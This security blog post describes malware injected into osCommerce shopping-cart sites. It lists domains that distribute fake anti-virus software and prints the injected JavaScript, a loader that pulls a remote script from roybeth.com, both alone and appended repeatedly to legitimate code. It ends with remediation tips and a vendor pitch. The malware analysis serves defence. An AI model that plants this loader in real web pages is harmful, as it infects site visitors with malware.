• osCommerce Attacks

    Malicious hackers are always looking to exploit software used by website owners to power their websites. One popular type of application that malicious hackers target is shopping carts, like osCommerce. This allows them to compromise a large number of websites using the software, infecting the visitors to these sites with malware.

    We have described how malicious hackers exploit osCommerce installations in a past article. This post details a new piece of malware that is affecting osCommerce websites.

    The attack
    Shopping carts like osCommerce are prime targets for malicious hackers since they are widely used, store a plethora of sensitive information, and are prime vector to embed malware on a website to infect visitors and customers.

    A recent trend is to display fake Anti-Virus pop up advertisements to visitors of a site when they land on an infected webpage. The following websites are being used to distribute the fake Anti-Virus malware.

    Sites distributing the malware:

    roybeth.com
    schenkenbrunn.at
    puremojofoto.com
    pindating.com
    nadobolchetrafa.cx.cc
    

    Compromised websites in the wild
    One example of a site infected with this specific malware is: www.surfmonster.co.uk. Take a look at the code below to see how the malware has been appended to the JavaScript.

    A sample of the actual malware:

     
    i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js”,ss="http://roybeth.com/ext/jquery.php";try { s=document.createElement("script"); s.src=ss; document.body.appendChild( s ); } catch(erst){ }
    

    A more detailed description of how the malware is appended is presented in one of our previous posts.

          this.hook.enabled = 1;
    
            // Cache so updates are infrequent.
            tiles.old = {
                    w: elmW,
                    h: elmH,
                    x: bgX,
                    y: bgY,
                    r: bgR
            };
    };
    var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }
    

    Recommended steps
    First, remove the malware. Then, upgrade your installation of osCommerce and analyze your website for application vulnerabilities. Additionally, securing the permission settings of your “admin” directory or renaming the directory to a value different than the default can mitigate automated attacks.

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…